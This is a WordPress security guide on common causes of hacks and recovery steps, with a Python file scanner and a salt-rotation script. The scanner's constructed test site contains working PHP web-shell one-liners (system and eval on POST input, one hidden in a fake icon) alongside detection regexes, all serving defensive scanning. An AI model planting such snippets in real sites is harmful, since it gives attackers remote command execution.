Has your WordPress website ever been hacked? If so, your first questions are how and why. In this article we will help you understand the common causes and the steps to take so you can reduce the chance of it happening again.
It is important to note that WordPress websites aren't the only websites being hacked; sites built on any platform can be vulnerable. WordPress is the most attacked simply because it is the most popular website builder in the world, which gives attackers a huge pool of sites to scan for the poorly maintained ones. Attackers have different intentions: some are beginners practising on weakly secured sites, while others have more malicious aims such as using your site to distribute malware, attack other websites or send spam.
Top causes of WordPress sites being hacked
Insecure Web Hosting
Like any website, a WordPress site is hosted on a web server. Some sites get hacked because the hosting platform itself is not secure (outdated server software, weak isolation between customers on shared hosting, or unnecessary services exposed to the internet), which leaves the site vulnerable no matter how well it is maintained. This can be avoided by choosing a reputable hosting provider, for example one listed in the WordPress.org hosting recommendations. Look into how the server is actually secured, because it is your first line of defense and can stop many common attacks before they ever reach WordPress.
Use of weak passwords
Having strong passwords is essential to the safety of your website. Weak passwords let attackers guess or crack them and gain complete access. A website uses many passwords: the WordPress admin account, FTP/SFTP accounts, the MySQL database user and the associated email accounts, and it is critical that each one is unique and strong. Use a password manager to generate and store them rather than typing a password into an online generator; a long random string of letters, numbers and symbols such as #2$&*/>@? is far harder to crack than anything memorable, and length matters more than any particular symbol.
Unprotected access to WordPress Admin
The WordPress admin area (/wp-admin and the wp-login.php login page) lets anyone who can log in manage the website. Leaving it exposed to the whole internet gives attackers unlimited attempts to guess passwords or exploit the login flow. Give it a second layer of protection: restrict access to it by IP address or HTTP authentication at the web server, limit failed login attempts, and enable two-factor authentication for every administrator account.
Not Updating WordPress
It is very important to keep WordPress itself updated. Many site owners are afraid to update in case it breaks the site; take a backup first and test on a staging copy if you can, but do not skip it. Every WordPress release fixes bugs and, frequently, security vulnerabilities, and once a fix is public the vulnerability is quickly turned into automated attacks against sites that have not applied it. Leave automatic minor/security updates enabled; WordPress has applied them in the background by default since version 3.7.
Not Updating Plugins or Themes
Updating all your plugins and themes (not just security plugins) is just as important as updating WordPress itself.
Most WordPress vulnerabilities are found in plugins and themes rather than in core, and an outdated plugin with a public vulnerability is one of the most common ways a site gets hacked. Authors usually fix reported flaws quickly, but a fix only helps once you install it. Delete plugins and themes you are not using, since their files stay on the server and can often still be requested directly even when the plugin is deactivated.
Using FTP instead of SFTP/SSH
FTP accounts are used to upload files to your web server. When you connect over plain FTP, your username and password (and every file you transfer) are sent unencrypted, so anyone on the network path can capture them. Use SFTP or SSH instead, which encrypt the whole session, and disable plain FTP on the server if your host allows it.
Using ‘Admin’ as a WordPress Username
Using 'admin' as your username is not recommended: it is the first username every brute-force tool tries, and it was the default on older installs. Change the username to something unique, not just the password. WordPress does not let you rename a user from the dashboard, so create a new administrator account with a different name, log in as that user, and delete the 'admin' account, attributing its posts to the new user. Keep in mind that usernames can also leak through author archive pages, so a strong password and two-factor authentication still matter.
Steps to take when your website is hacked
Indicators that your website has been hacked
- Google Safe Browsing has blacklisted your website
- Your host has disabled your website
- Your website has been flagged for distributing malware
- Users complain that their anti-virus is flagging your site
- You can see defacement, unexpected redirects or injected content when you load the site in a browser
- New user accounts appear that you did not create
1. Remain Calm
Getting your website hacked can be one of the most stressful online experiences anybody can go through. Yes, it might affect your brand and you might lose some money, but you can most definitely recover from this; all is not lost. Take a step back and compose yourself so you can take full control of the situation and recover your online presence methodically.
2. Create a document
It is always best to create a document with full details of what you are experiencing that leads you to believe you have been hacked. Below are some points to record:
- What are you seeing that makes you believe you are hacked?
- When did you first notice it?
- What changed recently? Plugins installed, theme changes, password changes, new users, hosting changes?
Whether you perform the incident response yourself or through a professional organisation, this timeline will prove valuable.
3. Scan your website
There are different ways to do this. You can install a security plugin such as Sucuri or Wordfence, which scans the files and database from inside the server, or use a remote scanner such as VirusTotal or aw-snap.info, which only examines what a visitor sees. Each scanner works differently and reports different things, so use more than one: a remote scanner will miss a backdoor that does not show up in rendered pages, and a plugin running on a compromised server can itself be tampered with. Prefer WordPress security plugins that have strong communities behind them and a long track record.
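To show what a file-level scan actually looks for, here is a small indicator scanner added for this article. It is not the Sucuri or Wordfence code; the pattern list is a constructed, non-exhaustive starting point, and the sample site it builds in a temporary directory is made up, with three planted files (a theme backdoor, a web shell in uploads, and PHP hidden in a fake icon). Every hit is something to review by hand, not proof of compromise, since legitimate plugins occasionally call functions such as system().

```python
"""Added example: offline indicator scan of a WordPress file tree.

Illustrative code written for this article, not a vendor's scanner. The
patterns are a constructed, non-exhaustive list of things commonly seen in
injected PHP (assumption: useful starting points, not a signature database).
"""
import os
import re
import tempfile

PHP_EXT = {".php", ".phtml", ".php5", ".inc"}

PATTERNS = {
    "eval of a decoded payload": re.compile(
        rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\("),
    "eval/assert fed from request input": re.compile(
        rb"(?:eval|assert)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    "preg_replace with the /e modifier": re.compile(
        rb"preg_replace\s*\(\s*['\"]/[^/]*/[a-zA-Z]*e[a-zA-Z]*['\"]"),
    "runtime function creation": re.compile(rb"\bcreate_function\s*\("),
    "command execution call": re.compile(
        rb"\b(?:shell_exec|passthru|system|proc_open|popen)\s*\("),
}


def scan_tree(root):
    """Walk `root` and return a sorted list of (relative_path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            try:
                with open(path, "rb") as fh:
                    data = fh.read(2_000_000)  # cap reads; large media is not worth scanning whole
            except OSError:
                continue
            # uploads should hold media only; a PHP file there is almost always planted
            if rel.startswith("wp-content/uploads/") and ext in PHP_EXT:
                findings.append((rel, "PHP file inside wp-content/uploads"))
            # PHP hidden in an image or text file, typically executed via a web server handler trick
            if ext not in PHP_EXT and b"<?php" in data:
                findings.append((rel, "PHP code inside a non-PHP file"))
            for reason, pattern in PATTERNS.items():
                if pattern.search(data):
                    findings.append((rel, reason))
    return sorted(findings)


def build_sample_site():
    """Create a constructed WordPress-like tree in a temp dir with three planted files."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    files = {
        "wp-includes/version.php": b"<?php\n$wp_version = '5.4';\n",
        "wp-config.php": b"<?php\ndefine('DB_NAME', 'wordpress');\n",
        # backdoor appended to a theme: decoded-and-eval'd payload
        "wp-content/themes/twentyten/functions.php":
            b"<?php\nadd_action('wp_head', 'twentyten_head');\n"
            b"eval(base64_decode('ZWNobyAnaGknOw=='));\n",
        # web shell dropped into the uploads directory
        "wp-content/uploads/2020/01/cache.php":
            b"<?php if (isset($_POST['c'])) { system($_POST['c']); } ?>",
        # PHP hidden inside a file that claims to be an icon
        "wp-content/uploads/2020/01/favicon.ico":
            b"\x00\x00\x01\x00" + b"<?php eval($_POST['x']); ?>",
    }
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for rel, reason in scan_tree(build_sample_site()):
        print(f"{rel}: {reason}")
```

Point scan_tree at the real document root to run it against a live install; the clean core file in the sample (wp-includes/version.php) produces no finding, while each planted file produces one or more. A scan like this complements, rather than replaces, comparing core files against a fresh download from WordPress.org.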
4. Scan your local environment
In addition to scanning your website, scan your own desktop and laptop. Malware on your computer can steal saved FTP or wp-admin credentials and hand them to the attacker, which explains many "mysterious" re-infections after a clean-up. Some malware is built to evade the anti-virus installed on that machine and no product detects everything, so if anything is found, treat the machine as compromised, clean or reinstall it, and only then change your website passwords, from a clean machine. This applies to Windows, OS X and Linux alike.
5. Check with your hosting provider
The hack may have affected more than just your website, especially on shared hosting. Contact your hosting company to find out what steps they are taking; they may be able to tell you whether your site was actually hacked or whether it was just a loss of service, and whether other customers on the same server were hit. In many cases a hacked site is used to send spam, and the server's IP address ends up on email blacklists. The best way to limit that damage is to host your business email with a separate provider such as Google Apps, so a compromised web server does not take your email down with it.
6. Be mindful of Website Blacklists
A Google blacklisting can do great harm to your brand. Website blacklisting is increasing; figures of 9,500 to 10,000 newly flagged websites per day have been reported. Warnings take several forms, such as full-page warning screens in the browser and labels next to your site in search results. Register your website with the major webmaster consoles so you are notified as soon as a problem is detected and can request a review once the site is clean:
- Google Search Console
- Bing Webmaster
- Norton Safe Web
- Yandex Webmaster
7. Improve your access controls
By access control we mean your FTP/SFTP, wp-admin, control panel and MySQL logins. Use strong, unique passwords for each and change them whenever you suspect they may have been exposed, so nobody who captured an old credential can reuse it. It is also highly recommended to use two-factor/multi-factor authentication wherever it is offered, which adds a second barrier even if a password leaks.
8. Reset all Access
Once you have identified the hack, the first and most important thing is to lock out anybody who may have access by changing the passwords. Start with your WordPress users: reset every account's password and delete any account you do not recognise. Then force a global logout by replacing the secret keys and salts in wp-config.php; generate a fresh set with the WordPress key generator at https://api.wordpress.org/secret-key/1.1/salt/ and paste the new values over the existing AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, NONCE_KEY and matching *_SALT definitions. Changing the keys invalidates every existing login cookie (including the attacker's) but does not change any password, so both steps are needed.
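The following example, added for this article and not WordPress's own code, covers both the strong-password advice above and this key rotation step. It generates random passwords and 64-character keys from the operating system's CSPRNG and rewrites the eight define() lines in a wp-config.php. It assumes the default wp-config.php layout (define('AUTH_KEY', '...'); on one line each) and uses a key alphabet that leaves out quotes and backslashes so the value drops into the PHP string literal unchanged; the SAMPLE_WP_CONFIG text is constructed for the demonstration.

```python
"""Added example: generating strong credentials and rotating the wp-config.php
secret keys. Written for this article; not WordPress's own code. Assumes the
default wp-config.php layout: define('AUTH_KEY', '...'); one per line.
"""
import math
import re
import secrets
import string

# Symbols accepted by most login forms (assumption; trim for a service that rejects any)
PASSWORD_ALPHABET = string.ascii_letters + string.digits + "#$%&*+-/<>=?@^_!"

# Key alphabet without quotes, backslashes or spaces so the value is a valid
# single-quoted PHP literal as-is (assumption made for this example)
SALT_ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*()-_[]{}<>~`+=,.;:/?|"

SALT_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")


def generate_password(length=24):
    """Random password from the OS CSPRNG; one per account, never reused."""
    if length < 16:
        raise ValueError("use at least 16 characters")
    return "".join(secrets.choice(PASSWORD_ALPHABET) for _ in range(length))


def password_entropy_bits(length, alphabet_size=len(PASSWORD_ALPHABET)):
    """Bits of entropy for a uniformly random password of this length."""
    return length * math.log2(alphabet_size)


def generate_salt(length=64):
    return "".join(secrets.choice(SALT_ALPHABET) for _ in range(length))


def _define_pattern(key):
    # matches define('KEY', 'value'); with either quote style and optional spacing
    return re.compile(r"define\(\s*(['\"])%s\1\s*,\s*(['\"])(.*?)\2\s*\)\s*;" % key)


def current_salts(wp_config_text):
    """Return {key: value} for every secret key currently defined."""
    found = {}
    for key in SALT_KEYS:
        match = _define_pattern(key).search(wp_config_text)
        if match:
            found[key] = match.group(3)
    return found


def rotate_salts(wp_config_text):
    """Replace all eight keys with fresh 64-character values.

    Returns (new_text, replaced_count). Rotating the keys invalidates every
    existing login cookie, which logs all users (including the attacker) out;
    it does NOT change anyone's password, so reset those separately.
    """
    new_text = wp_config_text
    replaced = 0
    for key in SALT_KEYS:
        new_text, count = _define_pattern(key).subn(
            lambda m, k=key: "define('%s', '%s');" % (k, generate_salt()), new_text)
        replaced += count
    return new_text, replaced


# Constructed sample with the placeholder values a fresh wp-config.php ships with
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_PASSWORD', 'changeme');
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');
$table_prefix = 'wp_';
"""

if __name__ == "__main__":
    rotated, count = rotate_salts(SAMPLE_WP_CONFIG)
    print(f"rotated {count} keys")
    print(rotated)
    print("new admin password:", generate_password())
```

Run it against a copy of the real wp-config.php, check that rotate_salts reports 8 replacements (a different number means the file's layout differs from the assumption and needs a manual edit), and only then move the new file into place. Do the password resets and the key rotation together: either one alone leaves the attacker a way back in.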
9. Create a Backup
It is very important to have a backup of your website; if you do not already have one, create one now, before you start cleaning, so you can return to this state if the clean-up goes wrong. Label it as a compromised copy and keep it separate from your normal backups. Ask your hosting provider what their backup policy is and whether they hold a copy from before the compromise. Always back up the files and the database together, and consider a backup plugin that runs on a schedule.
10. Remove the hack
This can be a very painful process, and how you approach it depends on your technical aptitude with websites and web servers.
Here are some sites to help you through the process:
- Did Your WordPress Site Get Hacked?
- How to Clean Your Hacked Install
- How To Clean a Hacked WordPress Site
- How to Cope With a Hacked Site
- Four Malware Infections
- How to Clean a WordPress Hack
Other steps to take when removing the hack:
- Restore files and database from a known-clean backup taken before the compromise, ideally one held by your hosting company; do not restore a backup taken after the site was hacked, as it will contain the backdoor.
- If no clean backup exists, replace the WordPress core, plugin and theme files with fresh copies downloaded from WordPress.org, then update everything to the latest version.
- Manually delete any malware files that the hosting company's scan picked up.
- Install security plugins and scan again.
- Remove any malicious files those scanners pick up and follow the advice the plugins give.
- Change all passwords, including admin, FTP and MySQL, and update wp-config.php with the new database credentials.
- Install Duplicator and make a backup of the clean site for emergencies.
Many websites get hacked every day, so it is important to put as much security on your website as you can to prevent it and reduce the chance of damage to your online brand. Most hacking attempts are opportunistic. In one widely cited survey, 51% of hacked WordPress sites were compromised through themes and plugins, 8% through weak passwords and the remainder through the hosting company's own security. You can greatly reduce the risk by avoiding default credentials, enabling two-factor authentication, serving the site over HTTPS, keeping everything updated and choosing a secure hosting server.